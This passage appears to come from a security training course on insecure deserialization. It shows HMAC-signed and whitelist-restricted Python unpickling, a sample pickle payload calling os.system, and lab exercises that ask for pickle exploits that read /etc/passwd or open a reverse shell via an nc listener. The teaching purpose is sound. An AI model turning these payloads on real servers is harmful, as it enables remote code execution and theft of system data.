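To see that ordering pay off, here is a self-contained sketch that throws a forged blob at a verify-then-load function. The names sign and verified_loads are stand-ins written for this demo, the key is a placeholder, and the "exploit" calls the harmless builtin sorted().

```python
import hashlib
import hmac
import pickle

SECRET = b'internal-process-secret'  # placeholder key for the demo


def sign(data, secret=SECRET):
    """Prefix data with its 32-byte HMAC-SHA256 tag."""
    return hmac.new(secret, data, hashlib.sha256).digest() + data


def verified_loads(blob, secret=SECRET):
    """Check the tag, and only then hand the bytes to pickle.loads()."""
    sig, data = blob[:32], blob[32:]
    expected = hmac.new(secret, data, hashlib.sha256).digest()
    if len(sig) != 32 or not hmac.compare_digest(sig, expected):
        raise ValueError("HMAC verification failed")
    return pickle.loads(data)


class Probe:
    """Stand-in for an exploit object."""
    def __reduce__(self):
        return (sorted, ([2, 1],))


# The attacker does not know SECRET, so the best they can do is guess a tag
forged = bytes(32) + pickle.dumps(Probe())

print(verified_loads(sign(pickle.dumps({'job': 42}))))
try:
    verified_loads(forged)
except ValueError as err:
    print("Rejected before unpickling:", err)
```

The forged payload never reaches pickle.loads(), so its callable never runs. The guarantee lasts exactly as long as the key stays secret.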
Restricted Deserialization: The RestrictedUnpickler
Python offers one more defense mechanism. pickle.Unpickler lets you override find_class(), so you can write a RestrictedUnpickler subclass that whitelists which modules and classes pickle is allowed to load:
import pickle
import io
class RestrictedUnpickler(pickle.Unpickler):
    """Only allows deserializing basic Python types."""
    ALLOWED_CLASSES = {
        ('builtins', 'set'),
        ('builtins', 'frozenset'),
        ('collections', 'OrderedDict'),
        ('datetime', 'datetime'),
        ('datetime', 'date'),
    }
    def find_class(self, module, name):
        # Called for every GLOBAL / STACK_GLOBAL import the pickle requests
        if (module, name) in self.ALLOWED_CLASSES:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(
            f"Blocked: {module}.{name} -- not in whitelist"
        )
def restricted_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()
# Test with benign data
safe_data = pickle.dumps({'key': 'value', 'number': 42})
print(restricted_loads(safe_data))  # {'key': 'value', 'number': 42}
# Works -- dicts, strings, and ints are basic types (no find_class needed)
# Test with malicious payload
import os
class Evil:
    def __reduce__(self):
        return (os.system, ('id',))
evil_data = pickle.dumps(Evil())
try:
    restricted_loads(evil_data)
except pickle.UnpicklingError as e:
    print(e)
# Blocked: posix.system -- not in whitelist   (nt.system on Windows)
This is significantly safer than raw pickle.loads() because the exploit can't load os.system or any other dangerous callable. Having said that, the whitelist approach has limitations. The attacker might find creative ways to chain whitelisted classes into exploits, and maintaining a whitelist that's both permissive enough to be useful AND restrictive enough to be safe is harder than it sounds. JSON is still the better choice for untrusted data -- a RestrictedUnpickler is a defense-in-depth measure, not a primary defense.
Defense Summary
- Never deserialize untrusted data with pickle, Java ObjectInputStream, PHP unserialize(), Ruby Marshal, or .NET BinaryFormatter
- Use JSON (or MessagePack, Protocol Buffers) for any data crossing trust boundaries -- between client and server, between services, in cookies, in message queues
- If you MUST use native serialization: sign the data with HMAC and verify the signature BEFORE deserializing
- Restrict deserialization to specific classes -- Python's RestrictedUnpickler, Java's ObjectInputFilter, PHP's unserialize($data, ['allowed_classes' => ['Session']])
- Monitor for deserialization attacks -- unexpected classes in deserialized data, pickles that fail to load, spikes in deserialization errors
Real-World Impact
The scale of insecure deserialization vulnerabilities is staggering:
- Apache Struts/Equifax (2017): 147 million records, $1.4 billion total cost. Patch was available 2 months before the breach.
- Apache Commons Collections (2015): Affected almost every Java enterprise application in existence. The CVE list for deserialization in Java alone is hundreds of entries long.
- Magento (e-commerce): PHP object injection in the admin panel allowed remote code execution. Thousands of online stores compromised, credit card data stolen.
- Drupal (2019): PHP deserialization bug in the core REST module. One request to the API -- full server compromise.
- Ruby on Rails (2013): YAML deserialization bug in the parameter parser. YAML's !!ruby/object tag allowed arbitrary object instantiation, leading to RCE on any Rails app.
Every one of these was a case where data crossed a trust boundary and was deserialized using a code-capable format. The fix was always the same: use a data-only format, or validate before deserializing. The same lesson, learned over and over, in language after language, framework after framework.
We've now covered the major web application vulnerability classes: injection attacks (SQL injection, XSS), trust-boundary attacks (CSRF, SSRF, authentication bypass), and data-format attacks (insecure deserialization). Each one exploits a different aspect of how applications handle input, but they all share the same root cause: trusting data that an attacker controls. The web attack surface is deep, and applications also accept user-supplied files -- uploads that can contain executable payloads, malware, or path traversal sequences that overwrite critical system files. That's a whole different category of input trust that we haven't explored yet.
Exercises
Exercise 1: Set up the vulnerable Flask pickle application from this episode. Create three different pickle exploits: (a) one that creates a file on the server (touch /tmp/pickle-pwned), (b) one that reads /etc/passwd and writes it to /tmp/passwd-stolen, (c) one that opens a reverse shell back to your Kali VM (start a listener with nc -lvnp 4444 first). For each exploit, generate the base64-encoded cookie, send it with curl, and verify the result. Document the payload creation and verification in ~/lab-notes/deserialization-attacks.md.
Exercise 2: Write a Python script called pickle_analyzer.py that takes a base64-encoded pickle payload as a command-line argument and analyzes it WITHOUT executing it. Use pickletools.dis() to disassemble the pickle opcodes, then scan the disassembly for dangerous patterns: GLOBAL opcodes that load modules like os, subprocess, socket, builtins. Test it against both benign pickles (a serialized dictionary) and malicious pickles (your exploits from Exercise 1). The script should output "SAFE: no dangerous operations" or "DANGEROUS: [list of flagged operations]". Save as ~/pentest-tools/pickle_analyzer.py.
Exercise 3: Build a "before and after" Flask application. The "before" version uses pickle for session storage in cookies (vulnerable). The "after" version uses JSON with HMAC signing (secure). Demonstrate that: (a) the pickle version is exploitable -- a crafted cookie executes commands on the server, (b) the JSON version is immune to code execution -- even a modified cookie can only produce data, never code, (c) the HMAC signature prevents tampering -- a modified JSON payload is rejected. Write a comparison document explaining why each change matters. Save everything in ~/deserialization-lab/.